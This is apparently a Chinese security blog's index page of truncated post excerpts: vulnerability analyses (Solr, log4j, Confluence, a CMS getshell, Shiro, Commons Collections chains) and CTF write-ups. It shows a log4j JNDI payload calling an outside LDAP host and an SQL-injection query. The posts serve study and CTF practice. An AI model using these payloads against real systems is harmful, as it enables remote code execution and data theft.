记一次失败的CVE-2021-44548分析
前言 之前在zsxq看到有师傅发solr的洞:CVE-2021-44548,今天看了一下,但是好像危害不大,不过还是以学习为主看一波 描述: Apache Solr 的 DataImportHandler 中的一个不正确的输入验证漏洞允许攻击者提供 Windows UNC 路径,导致从 Solr 主机向网络上的另一台主机进行 SMB 网络调用。 h…
log4j rce
log4j rce 影响版本: 2.0-beta9 到 2.14.1 修复版本: 2.15.0-rc2 payload: ${jndi:ldap://9zx4xu.dnslog.cn:1389/Exp} 分析: 先来看原来没修的 2.14.1 import org.apache.logging.log4j.LogManager; import or…
Confluence 漏洞分析
CVE-2019-3396 https://jira.atlassian.com/browse/CONFSERVER-57974 影响版本为: version < 6.6.12 6.7.0 <= version < 6.12.3 6.13.0 <= version < 6.13.3 6.14.0 <= versi…
讯睿cms前台getshell
目录结构,index.php包含Fcms\init.php做入口,核心controller代码在dayrui中 路由为?s=控制器文件夹&c=具体控制器&m=方法,如?s=member&c=login&s=index 直接到漏洞函数,首先通过get传入app name module参数 这里进入294行的else中,…
ciscn2021两道java题目
ciscn2021 华北半决赛 java 注册后登录,/message会显示所有的message,而浏览方式是通过/view,然后传path参数,存在任意文件读取 tree中给了目录树 . ├── pom.xml └── src └── main ├── java │ └── com │ └── nothing │ └── game │ ├── G…
GKCTF2021
easycms 网上找了个后台getshell的cms哪来改改用了,当作签到题。 ​ babycat 非预期: 首先是uploadServlet中doPost没权限校验导致guest也能直接传文件,其次在check函数后转发没返回,后面的代码依旧执行,造成了严重的非预期呜呜呜 if (checkExt(ext) || checkContent(it…
java写文件getshell
如果能任意文件读写,除了写jsp、crontab,如何getshell 写class 使用fastjson 1.2.68 先看一下原理: 使用期望类expectClass 如: public class testfj1268 extends Exception { private String domain; public testfj1268()…
ciscn2021初赛-writeup
梦回高考。也是好久没写博客了,水一下 easy_sql ')闭合,join报错注入字段,盲猜表名flag selectfrom (select from flag as a join flag b)c 然后挨个爆字段,直到第三个字段为一串uuid select from (select from flag join flag as b using(…
shiro550反序列化分析踩坑
环境搭建 github上下载源码,配上tomcat运行shiro-web shiro-root pom.xml <dependency> <groupId>javax.servlet</groupId> <artifactId>jstl</artifactId> <!-- 这里需要将…
cc链1-8分析
URLDNS 先看波poc package ysoserial; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import j…